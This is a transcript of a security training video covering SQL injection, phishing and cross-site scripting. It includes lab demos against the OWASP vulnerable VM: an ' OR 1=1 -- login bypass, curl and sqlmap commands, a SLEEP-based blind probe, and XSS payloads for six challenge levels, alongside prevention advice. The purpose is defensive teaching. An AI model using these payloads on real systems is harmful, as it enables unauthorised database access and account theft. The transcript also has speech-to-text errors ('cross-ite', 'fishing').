Now that we have reached the end of this part, let's recap what we learned. The main objective of a virus is to harm the data and information in a system, whereas the Trojan is about stealing data, files, and information; the effect of viruses is more drastic in comparison to Trojan horses. Viruses are non-remote programs, whereas Trojan horses are remotely accessed; and lastly, viruses have the ability to replicate themselves and harm multiple files, whereas Trojans do not have that replication ability.

So let's begin with what SQL injection is. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. SQL stands for Structured Query Language, the language used by an application to interact with a database. Normally this attack is targeted at a database to extract the data stored within; however, the vulnerability does not lie in the database itself. The vulnerability always lies in the application: it is the developer's prerogative to develop and configure the application so that SQL injection queries cannot get through. A database is created to answer questions, and if a question is asked, it is supposed to answer it. The database does need to be configured with some amount of security, but the flaw behind SQL injection will always lie in the application itself; it is how the application interacts with the database that needs to be modified and maintained by the developer, rather than just configuring the database. So when the attacker sends a query to the application, they form a malformed query by injecting a particular command or operator recognized by the SQL language; if that operator is passed through the application to the database, the database effectively gets cracked and performs a data dump because of that unwanted character coming in. That character needs to be filtered at the application level itself.

Now let's look at a quick demo. What I have here is a virtual machine called the OWASP Broken Web Applications VM, version 1.2. I'm going to power it on, and while it boots, let me show you where to download this utility from: search for the OWASP Broken Web Applications Project download and you'll find it on sourceforge.net. Click the link and you can download the project from there; it is a 1.9 GB download, and you get a machine image directly for VMware or Oracle VirtualBox. This application was developed by OWASP, the Open Web Application Security Project, a not-for-profit organization that periodically publishes the top 10 risks an application faces in a particular year. They provide a web application with built-in vulnerabilities for professionals like us to practice on and develop our skills, because doing this in the real world is illegal: I cannot go onto a live website to demonstrate how a SQL injection attack works, and neither should you try your hand at it until you are very well rehearsed. So, to upskill yourself, please download this machine, host it in VMware Workstation or Oracle VirtualBox, and then try your skills on it. Going back to the browser, if I open up a new tab you'll see that this machine has booted up with an IP address ending in 71.132.
If I browse to that address by typing 192.168.71.132, you'll see the OWASP Broken Web Applications project page. There are a lot of training applications: realistic, intentionally vulnerable applications, old versions of real applications, and so on, so there are plenty of built-in applications here that you can test your skills on. We're going to use the OWASP training application here, which presents the OWASP Top 10 risks for 2010, 2013, and 2017 (the latest one so far). The difference between 2013 and 2017 is that some entries have changed, but not all of them, and the order has shifted a little; you can see that SQL injection is at the top, A1, among the injection attacks. Multiple exercise types are given here: SQL injection for extracting data, SQL injection to bypass authentication, SQL insert injection attacks, and blind SQL injection; there is also a tool called SQLMap, available freely on Linux machines such as Kali Linux or Parrot, whichever you want to use for your practice targets.

Let's take the bypass-authentication exercise. This is a regular login page like any application may have: you see a username field and a password field, you type them in, and you log in. Say I don't know a password here: I type in the username test and the password test, try to log in, and it shows me that the account does not exist. So the authentication mechanism does work; I typed in a username and password, and it wasn't recognized.

Now let's try typing in a SQL query. I'll give it a single quote, which is an operator recognized by the SQL language and which, when the database tries to execute it, can cause the database to dump data or, in this case, bypass authentication; and I'll add a condition, making the full input ' or 1=1 -- (single quote, or 1=1, then a space, a double hyphen, and a trailing space). Right now I'm not logged in at all, and our test username and password didn't work. But when I click login now, you'll see a status update saying the user has been authenticated, and I'm logged in as admin. That is what these SQL queries can achieve. I'm going to log out now, and we'll look at the basics of SQL injection.
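The same demo can be replayed from the command line with curl. A sketch against the lab VM, assuming the login form posts username and password fields to a login.php page; the exact page path, field names, and response strings vary by exercise, so treat all of them as placeholders and inspect the real form first:

```bash
#!/bin/bash
# Replays the two login attempts from the demo against the lab VM.
# PAGE and the field names are placeholders; inspect the real form first.
PAGE="http://192.168.71.132/login.php"

# 1) A normal, failing login attempt
curl -s -d "username=test&password=test" "$PAGE" | grep -i "account does not exist"

# 2) The bypass: the quote closes the string in the SQL statement,
#    OR 1=1 makes the WHERE clause always true, and -- comments out
#    the password check that follows.
curl -s --data-urlencode "username=' OR 1=1 -- " \
        --data-urlencode "password=anything" \
        "$PAGE" | grep -i "authenticated"
```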
So, what types of SQL injection are available? The first is in-band SQL injection, which has two subtypes: the error-based injection attack and the union-based injection attack. The second type is the blind SQL injection attack, with boolean-based and time-based variants, and the third is the out-of-band SQL injection attack.

What is in-band SQL injection? In-band is where we attempt either the error-based or the union-based approach. In an error-based attack, we craft a query to the database that makes it generate an error message and dump that message right in front of us on the screen; this tells us there is a flaw, and the information dumped on the screen can be used to craft our further queries as we go. Union-based is where we combine multiple statements at the same time: if you look at the URL, you'll see a large structure in it, and we can try to add two or more statements within the URL itself to combine them, confusing the database into executing both statements together and producing a data dump at the same time.

So what does an error-based SQL injection look like? Going back to the same login page: remember, we gave the username field ' or 1=1 -- , a condition. The single quote is an operator that closes the string, so the query went to the database, selected from the default users table, and compared it against the condition we supplied instead of against a password. The condition we gave was 1=1, which is always true, so it selected the default user account available in the database. If I instead give it ' or 1=2 -- , where the condition is false, and try to log in, you'll see "account does not exist" comes back again, because the condition was false and the user account was compared to that condition rather than to a password. Give it ' or 1=1 -- again and log in, and you can see this is a true condition, so we are able to log in.

Before we even go to that extent: if I drop the condition and just send a single quote, the bare operator, to the database and click login, you'll see it generates an error right at the top. It tells us the line and the file where the error happened (you can see it happened in the MySQL handler PHP file), and it gives us the message: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use. Why would a hacker want to do this in the first place? Because there are different types of databases: MySQL, MSSQL (Microsoft SQL Server), Oracle, IBM DB2. All of these are variations of a SQL database and use the SQL language, but every database has its own syntax and its own specific commands. In this scenario the hacker wants to identify which database is currently in use, so they can craft queries for that particular product. With this injection, just by sending the quote and generating the error, I now know we are running a MySQL server, that its version is 5.1.73, and the rest of the information about where the handlers are located and so on. This tells the hacker how to proceed next: what kind of queries to create and what syntax to use. So an error-based attack is where you generate these kinds of errors and harvest the information; union-based is where you craft your queries within the URL, or combine multiple statements within the input fields, and try to generate a response from that.

Then we come to boolean-based blind SQL injection, which sends a SQL query to the database that forces the application to return a different result depending on whether the query evaluates to true or false. Think of it like a truth table: if both inputs are false, the output is false; if one input is false and the other, input B, is true, the output is true; and so on. Depending on the results, the attacker learns which input holds true, and with this they can map out the database of the website.
In other words, you send multiple inputs and analyze the outputs to see exactly which command worked and what each command's resultant output was; from this kind of information the hacker infers the next step forward.

Then you have time-based SQL injections. There are times when a database administrator or an application administrator has done some security configuration and disabled verbose error messages. What is a verbose error message? The error we saw earlier is one: it gives out details about what the database is, its version, and so on. If those errors have been sanitized and you can no longer generate them, you cannot figure out what the database is, so what do you do? For example, if I go to simplilearn.com and visit a URL that is not accessible, you can see it gives a generic error ("oops, looks like you have crash-landed on Mars"); it doesn't give the verbose error we saw in the lab, which detailed what went wrong, the database, the database version, where the query failed, and so on. On a site with that much security in place, you just get a generic page. In that case, the hacker injects a time-based query into the URL, which lets us verify whether the command is being executed: we put in a time wait, say 10 seconds. If, the moment we inject the query, the response stalls for 10 seconds and then executes, SQL injection is possible; if the query executes without the delay, a time-based injection attack is not possible on that particular site.

Out-of-band injection is not a very common attack; it depends on particular features being enabled on the database management system used by the web application, so it is somewhat of a misconfiguration error by the database administrator: functions have been enabled but not sanitized, access controls haven't been set up properly, and account control is missing. Queries should never be executed at an administrative level; they should always be executed at a user level, with the minimum privileges required for that query. If these kinds of functions are enabled on the DBMS and an administrative account has access to them, an out-of-band injection attack becomes possible.
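Both blind techniques can be automated; SQLMap, the tool mentioned earlier, does exactly this. A hedged sketch of probing by hand and then letting SQLMap take over; the vulnerable URL and parameter below are placeholders standing in for a page on the lab VM:

```bash
#!/bin/bash
# Manual time-based probe: if the page takes ~10s longer with the
# injected SLEEP(10), the parameter is injectable. URL is a placeholder.
URL="http://192.168.71.132/view.php?id=1"

time curl -s -o /dev/null "$URL"                              # baseline timing
time curl -s -o /dev/null "${URL}%27%20OR%20SLEEP(10)--%20-"  # ' OR SLEEP(10)-- -

# SQLMap automates detection and enumeration of the same flaw
sqlmap -u "$URL" --batch --dbs   # --batch: accept defaults, --dbs: list databases
```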
Now let's look at how a website works, and how SQL fits into it. A website is constructed from HTML, Hypertext Markup Language, with JavaScript for functionality, Cascading Style Sheets for the layout of the site, and frameworks like ReactJS for further functionality. When we send a query to the website, it normally travels over the HTTP or HTTPS protocol; when the query reaches the application, the application generates the SQL query. On the client side you have all the scripting languages on the front end, which we can use to craft queries and send them across; on the server side you have databases like Oracle, MySQL, or MSSQL that then execute those queries.

To give you an example, I'll use a tool called Postman. What we generally do when we craft a query is send a GET request to a website and receive a response with the HTML code and everything else; Postman is a tool used by software testers to examine the responses they get from various websites. On the left-hand side you can see I've used it quite a bit, and here we have an example for gmail.com, so let's continue with that. This is a GET request being sent to Gmail: the moment I send it, it creates an HTTP request and sends it across, and the response I get back is the HTML code for gmail.com, along with the cookies and the headers that carry metadata. You can see the content type is text/html, the character set used is UTF-8, and the rest reflects how the application has been configured; this is the cookie that was sent with that particular request.

Now analyze what happened on the login page. When we typed in that single quote and generated the error, you could see that the application had converted our input into a SQL query. The query was SELECT username FROM accounts WHERE username = '...', with our input between single quotes, and the extra quote we supplied is exactly where the exception error occurred. These are the kinds of queries that are structured by the application and carried to the database for execution: what we type goes out as an HTTP GET request with the username and password in the query, the application converts it into a SQL query and sends it to the database, and the database responds with the appropriate response.

So how do we prevent SQL injection in the first place? Use prepared statements and parameterized queries. These statements make sure the parameters passed into SQL statements are treated in a safe manner. For example, we saw that the single quote acted as an operator; it shouldn't be allowed through as part of a query in the first place. A secure way of running a SQL query in JDBC uses a parameterized statement: you define which user you want to find (say, by an email string), create the connection to the database, and construct the SQL statement you want to run with a parameter placeholder, so that you control what can be passed to the database and what cannot.
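The transcript describes the JDBC version of this; the same idea can be sketched from a Bash shell using the mysql client and MySQL's server-side prepared statements. The database, user, and password values are placeholders, and the accounts table simply mirrors the one from the demo:

```bash
#!/bin/bash
# Parameterized lookup via a server-side prepared statement.
# appdb/appuser are placeholders; the accounts table mirrors the demo.
mysql -u appuser -p appdb <<'SQL'
PREPARE login FROM
  'SELECT username FROM accounts WHERE username = ? AND password = ?';
SET @u = ''' OR 1=1 -- ';   -- the attack string is now just data...
SET @p = 'anything';
EXECUTE login USING @u, @p; -- ...so it matches no row instead of bypassing the check
DEALLOCATE PREPARE login;
SQL
```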
Then we have object-relational mapping: most development teams prefer to use ORM frameworks to make the translation of SQL result sets into code objects more seamless, mapping objects rather than hand-building SQL strings. And then there is escaping inputs, a simple way to protect against many SQL injection attacks; many languages have standard functions to achieve this. You need to be very careful when relying on escape characters in your codebase, because not all injection attacks rely on abusing the same characters: when a SQL statement is constructed, you need to know which characters are recognized as operators in the configuration, structure, and code you have created. You need to sanitize those operators and ensure they cannot be accepted as user input; if they are, they must be weeded out by the application so they never reach the database.

Other methods of preventing SQL injection include password hashing, so that passwords cannot be bypassed, recovered, or cracked, and third-party authentication, where you use OAuth or some other single sign-on service so that a third party maintains the security of authentication and of the parameters being passed, for example a LinkedIn or Facebook login. For the layman: when you start playing a game that lets you log in with your Facebook or Google credentials, that is not just for ease of use. The developer has outsourced the authentication mechanism to a third party such as Facebook or Google because they understand that that mechanism is about as safe as can be: Facebook and Google are wealthy organizations that hire a lot of security experts, and the development behind their authentication mechanisms is top-notch. A small organization cannot spend that kind of money on security alone, so it uses a third-party authentication mechanism to keep these kinds of attacks from happening.

Then there are web application firewalls. Having a web application firewall and configuring it properly against SQL injection attacks is one of the surest methods of mitigating or minimizing the threat. Say you've realized that the application has some SQL injection vulnerabilities, and instead of recoding or restructuring the application you want the easier or cheaper way out: you install a web application firewall and configure it to identify malicious queries and stop them at the firewall level, so they never reach the application and the application's vulnerabilities never get exercised.

Buy better software, and keep updating it. It is not the case that software, once installed, is safe for life: new vulnerabilities are discovered every day, every hour, and what is secure today may be completely insecure tomorrow or the day after. So keep upgrading the software; if no upgrades are available and the vulnerabilities still exist, you might want to migrate to better software and thus make sure you don't get hacked. Always install updates and patches: organizations keep sending them out as they are released, and you need to install them to enhance your security posture. And continuously monitor SQL statements and databases: use protocol monitors, other software, and your firewalls to keep watching the kinds of queries you are receiving, and based on those queries ensure the inputs, and the queries being created, are not detrimental to the health of the software you have.

Jane is relaxing at home when she receives an email from a bank that asks her to update her credit card PIN in the next 24 hours as a security measure.
Judging the severity of the message, Jane follows the link provided in the email. After she submits her current credit card PIN and the supposedly updated one, the website becomes unresponsive, prompting her to try again later. A couple of hours afterwards, however, she notices a significant purchase from a random website on that same credit card, one she never authorized. Frantically contacting the bank, Jane realizes the original email was a counterfeit, a fake message with a malicious link that enabled credit card fraud. This is a classic example of a phishing attack.

Phishing attacks are a type of social engineering in which a fraudulent message is sent to a target on the premise of coming from a trusted source. Its basic purpose is to trick the victim into revealing sensitive information like passwords and payment information. The name plays on the word "fishing," which works on the concept of bait: if the intended victim takes the bait, the attack can go ahead, which in our case makes Jane the fish and the phishing email the bait. If Jane had never opened the malicious link, or had been cautious about the email's authenticity, an attack of this nature would have been relatively ineffective.

But how does the hacker gain access to these credentials? A phishing attack starts with a fraudulent message, which can be transmitted via email or chat applications; using SMS conversations to impersonate legitimate sources is known as smishing, a specific category of phishing attack. Irrespective of the manner of transmission, the message targets the victim in a way that coaxes them to open a malicious link and provide critical information on the corresponding website, and more often than not the websites are designed to look as authentic as possible. Once the victim submits information through the link, be it a password or credit card details, the data is sent to the hacker who designed the email and the fake website, giving him complete control over the account whose password was just provided. Phishing is often carried out in campaigns where an identical email is sent to thousands of users; the rate of success is relatively low, but never zero. Between 2013 and 2015, corporate giants like Facebook and Google were tricked out of $100 million in an extensive phishing campaign in which the hackers impersonated a known common associate. Apart from credential theft, some of these campaigns target the victim's device and install malware through the malicious links, which can later function as part of a botnet or as a target for ransomware attacks.

There is no single formula: there are multiple categories of phishing attacks. The issue with Jane, where the hacker stole her bank credentials, falls under the umbrella of deceptive phishing: a general email is sent out to thousands of users in the hope that some of them fall prey to the scam. Spear phishing, on the other hand, is a more customized version: the targets are researched before being sent an email. For example, if you have never had a Netflix subscription, sending you an email that appears to come from the Netflix team is pointless, which is a potential drawback of deceptive phishing techniques. On the other hand, a simple screenshot of a Spotify playlist shared on social media indicates a probable point of entry: the hacker can send counterfeit messages to the target user implying they come from Spotify, tricking them into sharing private information. Since the hacker already knows the target uses Spotify, the chances of the victim taking the bait increase substantially.
like CEOs and people with a fortune on their back the research done is tenfold which can be called a case of whaling the hackers prepare and wait for the right moment to launch their fishing attack often to steal industry secrets for rival companies or sell them off at a higher price apart from just emails farming focuses on fake websites that resemble their original counterparts as much as possible a prevalent method is to use domain names like Facebook with a single O or YouTube with no E these are mistakes that people make when typing the full URL in the browser leading them straight to a counterfeit web page which can fool them into submitting private data a few more complex methods exist to drive people onto fake websites like ARP spoofing and DNS cash poisoning but they are rarely carried out due to time and resource constraints now that we know how fishing attacks work let’s look at ways to prevent ourselves from becoming victims while the implications of a fishing attack can be extreme protecting yourself against these is relatively straightforward jane could have saved herself from credit card fraud had she checked the link in the email for authenticity and that a redirected to a secure website that runs on the HTTPS protocol even suspicious messages shouldn’t be entertained one must also refrain from entering private information on random websites or pop-up windows irrespective of how legitimate they seem it is also recommended to use secure anti-ishing browser extensions like cloudfish to sniff out malicious emails from legitimate ones the best way to prevent fishing is browsing the internet with care and being on alert for malicious attempts at all times start by learning about cross-ite scripting from a layman’s perspective cross-ite scripting also known as XSS is a type of code injection attack that occurs on the client side the attacker intends to run harmful scripts in the victim’s web browser by embedding malicious code in a genuine web page or online application the real attack takes place when the victim hits the malicious code infected web page or online
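The link check Jane skipped can even be automated. A small Python sketch of the idea, assuming a hypothetical allowlist of trusted bank domains and invented URLs:

```python
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"mybank.com", "www.mybank.com"}  # hypothetical bank domains

def looks_safe(link: str) -> bool:
    parsed = urlparse(link)
    # Require HTTPS and an exact match against domains we already trust;
    # lookalike hosts such as "mybank.com.account-verify.ru" fail the check.
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_DOMAINS

print(looks_safe("https://www.mybank.com/update-pin"))        # True
print(looks_safe("http://mybank.com.account-verify.ru/pin"))  # False
```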

Let's now learn about cross-site scripting from a layman's perspective. Cross-site scripting, also known as XSS, is a type of code injection attack that occurs on the client side. The attacker intends to run harmful scripts in the victim's web browser by embedding malicious code in a genuine web page or online application; the real attack takes place when the victim visits the infected page or application, which serves as the vehicle delivering the malicious script to the user's browser. Forums, message boards, and pages that enable comments are vulnerable vehicles frequently utilized for cross-site scripting assaults.

A web page or web application is vulnerable to XSS if the output it creates contains unsanitized user input, which the victim's browser must then parse. Cross-site scripting attacks are conceivable in VBScript, ActiveX, Flash, and even CSS, but they are most ubiquitous in JavaScript, simply because JavaScript is fundamental to most browsing experiences today. The main purpose of the attack is to steal another user's identity, be it via cookies, session tokens, or other information. In most cases it is used to steal cookies: since cookies let us log in automatically, stolen cookies allow an attacker to log in under another identity — one of the reasons this attack is considered among the riskiest. It can be performed with various client-side programming languages. Cross-site scripting is often compared with similar client-side attacks, as client-side languages are mostly what is involved; however, an XSS attack is considered riskier because of its ability to damage even less vulnerable technologies. Most often, the attack is performed with JavaScript and HTML.

JavaScript is a programming language that runs on web pages inside your browser. This client-side code adds functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms. Unlike server-side languages such as PHP, JavaScript runs inside your browser and cannot impact the website for other visitors: it is sandboxed to your own browser and can only perform actions within your own browser window. While JavaScript is client-side and does not run on the server, it can interact with the server by performing background requests. Attackers can use such background requests to add unwanted spam content to a web page without refreshing it, to gather analytics about the client's browser, or to perform actions asynchronously.

The manner of attack can vary. It can be a single link the user must click to initiate a piece of JavaScript code, or an image used as a front end for malicious code that gets installed as malware. With the majority of internet users unaware of how metadata works or how web requests are made, the chances of victims clicking on redirecting links are far too high. Cross-site scripting can occur through a malicious script executed at the client side, via a fake page, or even through a form displayed to the user on websites carrying advertisements; malicious emails can also be sent to the victim. These attacks happen when a malicious user finds the vulnerable parts of a website and feeds them appropriately crafted malicious input.

Now that we understand the basics of cross-site scripting, let's look at how this kind of attack works in the first place. We have the website or web application that shows content to the victim — the user, in our case. Whenever the user wants some content, the website requests the data from the server; the server provides it to the website and the web browser, and it ultimately reaches the victim. Here is where the hacker comes into play: they pass certain arguments to the web application, which can then be forwarded back to the server or to the user at hand. The entire cross-site scripting attack vector consists of sending and injecting malicious code or script. Depending on the type of attack, the malicious script may be reflected in the victim's browser, or stored in the database and executed every time the user calls the appropriate function. The main enabler of this attack is inappropriate user-input validation, which lets malicious input get into the output: a malicious user enters a script which is injected into the website's code, the browser has no way of knowing whether the code it executes is malicious, and so the script runs in the victim's browser, or a faked form is displayed to users.

There are many ways to trigger an XSS attack: execution could fire automatically when the page loads, or when a user hovers over specific elements of the page, like hyperlinks. Potential consequences include capturing a user's keystrokes, redirecting the user to malicious websites, running web-browser-based exploits, obtaining the cookies of a user who is logged into a website, and more. In some cases, a cross-site scripting attack leads to complete compromise of the victim's account; attackers can trick users into entering credentials on a fake form, which delivers everything to the attacker.

With the basic workings out of the way, let's go over the different ways hackers can leverage vulnerable web applications to gather information and eventually breach those systems. The prime purpose of an XSS attack is to steal another person's identity — cookies, session tokens, and so on — or to display fake pages or forms to the victim, and it can be performed in several variants.

The first variant is the reflected attack. This occurs when a malicious script is not saved on the web server but is reflected in the website's results. Reflected XSS code is not stored permanently; the malicious code is reflected in a website result, and the attack code can be included in a faked URL or in HTTP parameters. It can affect the victim in different ways: by displaying a fake malicious page, or by arriving in a malicious email. In a typical reflected cross-site scripting example, the input of a search form is reflected on the page to show what the search key was. An attacker may craft a URL containing malicious code and then spread that URL via email or social media; a user who clicks the link opens the valid web application, which then runs the malicious code in their browser. The script is not stored in the web application, and the malicious code is shown to that one user only — the user who opens the link executes the script — so the attack is not necessarily visible on the server side or to the app owner.
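To make the reflected-search example concrete, here is a minimal Python sketch of the fix using the standard-library html module; the page fragment and payload are invented for illustration:

```python
import html

def render_search_page(search_key: str) -> str:
    # Vulnerable: the search key reflected into the page unmodified means
    # "<script>alert(1)</script>" would execute in the victim's browser.
    unsafe = "<b>You searched for: " + search_key + "</b>"

    # Safer: escape user input before it reaches the HTML output, turning
    # the characters < > & " ' into harmless entities.
    safe = "<b>You searched for: " + html.escape(search_key) + "</b>"
    return safe

print(render_search_page("<script>alert(1)</script>"))
# <b>You searched for: &lt;script&gt;alert(1)&lt;/script&gt;</b>
```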
The next variant is the stored cross-site scripting attack, which occurs when a malicious script is saved on the web server permanently. This can be considered the riskier variant, since it has leverage for more damage. In this type of attack, the malicious code or script is saved on the server — in the database, for example — and executed every time users call the appropriate functionality, so a stored XSS attack can affect many users; and because the script lives on the web server, it will affect the website for a longer time. To perform a stored XSS attack, the malicious script is sent through a vulnerable input form — a comment field or a review field, for example — so that the script is saved in the database and evaluated on page load or when the appropriate function is called. In a stored XSS example, the script might have been submitted via an input field to a web server that did not perform sufficient validation and stored the script permanently in its database. The consequence is that the script is delivered to every user visiting the web application and may, for example, gain access to the users' session cookies. In this attack the script is permanently stored in the web app; users visiting the app after the infection retrieve the script, the malicious code exploits the flaws in the web application, and the script and the attack are visible on the server side — to the app owner as well.

The third variant is the DOM-based cross-site scripting attack. This type of attack occurs when the DOM environment is changed while the client-side code itself does not change: because the DOM environment is modified in the victim's browser, the client-side code executes differently. To get a better sense of how a DOM XSS attack is performed, consider a website — say, testing.com — where default is a URL parameter; to perform the DOM XSS attack, we send a script as that parameter. A DOM-based XSS attack may succeed even when the server does not embed any malicious code in the web page, by exploiting a flaw in the JavaScript executed in the browser. For example, if the client-side JavaScript modifies the DOM tree of the page based on an input field or a GET parameter without validating the input, malicious code can be executed. The code exploits flaws in the browser on the user's side, and the script and the attack are not necessarily visible on the server side or to the app owner.

By now it is clear that cross-site scripting attacks are difficult to detect and even tougher to fight against. There are, however, plenty of ways to safeguard against them; let's go through some preventive measures. As mentioned, XSS attacks are sometimes difficult to detect, but that changes if you get some external help: one way to prevent XSS is to use automated testing tools such as the Crashtest Security Suite or the Acunetix security suite. Manual testing is highly time-consuming and costly, and therefore not feasible for every iteration of your web application — yet your code shouldn't go untested before any release. With automated security testing, you can scan your web application for cross-site scripting and other critical vulnerabilities before every release, ensuring the live version of your application remains secure whenever you alter or add a feature.

Input fields are the most common point of entry for XSS attack scripts, so you should always screen and validate any information entered into data fields. This is particularly important if the data will be included in HTML output, and it helps protect against reflected XSS attacks. Validation should occur on both the client side and the server side as an added precaution: it vets the data before it is sent to the server and can also protect against persistent XSS scripts. On the client side this can be accomplished using JavaScript; a server-side counterpart is sketched below.
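A minimal Python sketch of the server-side half of that validation; the allowlist pattern and field name are invented for illustration:

```python
import re

# Allowlist validation: accept only the characters the field legitimately
# needs and reject everything else before storing or displaying it.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,20}$")

def validate_username(value):
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("invalid username")
    return value

for candidate in ("jane_42", "<img src=x onerror=alert(1)>"):
    try:
        validate_username(candidate)
        print(repr(candidate), "-> accepted")
    except ValueError:
        print(repr(candidate), "-> rejected")
```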
XSS attacks only appear when user input is displayed on the web page, so try to avoid displaying untrusted user input wherever possible. If you need to display user data, restrict the places where it may appear: any input displayed inside a JavaScript tag, or in a URL shown on the site, is much more likely to be exploited than input that appears inside a div or a span element in the HTML body. Protecting against XSS vulnerabilities typically requires properly escaping user-provided data that is placed on the page. Rather than trying to determine whether the data is user-provided and could be compromised, play it safe and escape data whether it is user-provided or not. Unfortunately, because there are many different escaping rules, you must still choose the proper type of escaping before settling on final code. Encoding should be applied directly before user-controllable data is written to a page, because the context you are writing into determines the kind of encoding you need: values inside a JavaScript string require a different type of escaping from values in an HTML context. Sometimes you will need to apply multiple layers of encoding, in the correct order. For example, to safely embed user input inside an event handler you need to deal with both the JavaScript context and the HTML context, so you first Unicode-escape the input and then HTML-encode it.

Content Security Policy, or CSP, is a computer security standard introduced to prevent cross-site scripting, clickjacking, and other code injection attacks resulting from the execution of malicious content in the trusted web-page context. It is a candidate recommendation of the W3C working group on web application security, is widely supported by modern web browsers, and provides a standard method for website owners to declare the approved origins of content that browsers should be allowed to load on their website.

HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client-side script accessing the protected cookie — provided the browser supports it. If the HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through a client-side script; as a result, even if a cross-site scripting flaw exists and a user accidentally follows a link that exploits it, the browser will not reveal the cookie to a third party. If a browser does not support HttpOnly and a website attempts to set such a cookie, the flag is ignored by the browser, creating a traditional, script-accessible cookie that becomes vulnerable to theft or modification by any malicious script.
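Both of these defenses amount to a couple of response headers. A minimal sketch using Python's standard-library http.server; the policy string and cookie value are illustrative only:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class SecureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # CSP: only allow resources from our own origin, which blocks
        # injected inline scripts and scripts loaded from foreign hosts.
        self.send_header("Content-Security-Policy",
                         "default-src 'self'; script-src 'self'")
        # HttpOnly: the session cookie is invisible to client-side
        # JavaScript, so an XSS payload cannot read document.cookie.
        self.send_header("Set-Cookie", "session=abc123; HttpOnly; Secure")
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<h1>hello</h1>")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), SecureHandler).serve_forever()
```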
Next on our docket is a live demonstration in which we solve a set of cross-site scripting challenges, starting from the basic level and working up to the topmost level six.

We start at level one. This web application demonstrates a common cause of cross-site scripting: user input is included directly in the page without proper escaping. If we interact with the vulnerable application window and find a way to make it execute JavaScript of our choosing, we can take actions inside the vulnerable window or directly edit its URL bar. This task needs only basic knowledge, so let's see why the most primitive injections work here. We begin with a simple query — a phrase containing a single quote as a special character — and inspect the resulting HTML page. The single quote appears in the result, and the provided query text is placed directly inside a b (bold) tag. We need to perform a reflected XSS against this web application; these are non-persistent attacks, so the payload must be included in the URL for successful exploitation. Any payload would do, but we will use a simple one that pops an alert, since it is easy to demonstrate: we type a payload along the lines of `<script>alert('xss')</script>` into the search box and press search. As you can see, we have successfully launched our first cross-site scripting attack — an alert box pops up with our message — and a similar process could be used to steal browser cookies and passwords, albeit with different commands.

Now we move to level two. This web application shows how easily XSS bugs can be introduced in complex chat applications: conversations are stored in a database and retrieved when a user wants to see them, so if a malicious user injects some JavaScript code, all visitors will be infected. This kind of cross-site scripting is more powerful and riskier than a reflected attack, which is why it is known as stored XSS. I posted my query with a single quote as the special character, and whatever I typed simply appeared on the page after I clicked on share status. Looking at the source, the text I posted is placed directly inside a blockquote tag, so even the simple script tag we used in level one should work here — but it does not. Examining the code (toggle the code pane and check the index.html file), the important part is line 32: the generated HTML fragment — the html variable in the code — is added to the main HTML using the innerHTML method. When the browser parses an HTML fragment via this method, it will not execute any script tag defined within it; that is why the level-one script tag fails here. The solution is to use events, which will execute the JavaScript we define. We inject an image element along the lines of `<img src='nonexistent' onerror='alert(1)'>` and press share status: the injection loads an image that doesn't exist, which triggers an onerror event, and the onerror handler executes our alert method. With that we beat level two and move up to the next level in our challenge.

At level three, clicking on any tab causes the tab number to be displayed in the URL fragment — a hint that the value after the hash controls the behavior of the page, i.e. it is an input variable. To confirm, we analyze the code: in line 43, inside the event handling, the value provided after the hash in the URL is passed directly to the chooseTab method, with no input validation performed. The value passed to chooseTab is injected directly into the img tag in line 17 — an unsafe assignment, and the vulnerable part of the code. All we have to do now is craft a payload that adjusts the img tag to execute our JavaScript. Remember, the script tag from level one won't work here either, since the html variable is used to add to the DOM dynamically; events are once again the answer. I'll use the existing img tag and change its source to something that doesn't exist, forcing it to fail and execute an onerror event to which I pass my script via the URL. Once we visit that URL, our JavaScript pop-up opens with the message that XSS level 3 has been completed.

Level four presents a different kind of attack. This web application has a timer on the page: whatever number we put in the box, a countdown starts, and when it finishes the application alerts that the countdown is done and resets the timer. Evidently, the value entered in the text box is transferred to the server via the timer parameter in the URL. Examining the code in timer.html: at line 21, the startTimer method is called in the onload event, and the timer parameter is passed directly to it. We need to pop an alert in the web application by escaping the contents of the startTimer call without breaking the JavaScript code; since the parameter value is added to startTimer without any filtering, we can inject an alert function to be executed inside the onload event alongside startTimer. We replace the argument with our script, press create timer, and get a pop-up confirming that XSS level four is completed.

On to level five, where the challenge is different. As the description says, cross-site scripting isn't just about correctly escaping data: sometimes attackers can do bad things even without injecting new elements into the DOM. This one is a kind of open redirect, because the attack payload executes as a result of modifying the DOM environment in the victim's browser — the environment used by the original client-side script — so that the client-side code runs in an unexpected manner. The vulnerability is easily spotted by inspecting the next link on the signup page: the href attribute of the next link is confirm, which is exactly the value of the next URL query parameter. That means the next query parameter can be used to inject JavaScript into the href attribute of the link, and as soon as the user clicks the link, the script is triggered. We enter anything at random, click next, and see the XSS level five alert we provided in the URL as the value of the next parameter. Since the value appears in a pop-up, the attack succeeds, and we move on to the final level six.
Level six shows how external JavaScript is retrieved. If you analyze the URL, you can see that a script is already being loaded; the vulnerability lies in how the code handles the value after the hash. On line 45, the value right after the hash is taken as the gadget name, and on line 48 that value is passed directly to the includeGadget method. Inside includeGadget, on line 18, a script tag is created, and the gadget-name URL value is used directly as the source attribute of that script tag on line 28. This means we completely control the source attribute of the script tag being created — with this vulnerability we can inject our own JavaScript file into the code. We inject the URL of a JavaScript file we host into the web application's URL after the hash; the URL must not use HTTPS (or anything similar) in order to bypass the regular expression used for security checking. We remove the pre-stored URL, load our own JavaScript file, and with that we have reached the end of our challenge, having completed six different varieties of cross-site scripting attacks with a different solution for each of the six problems.

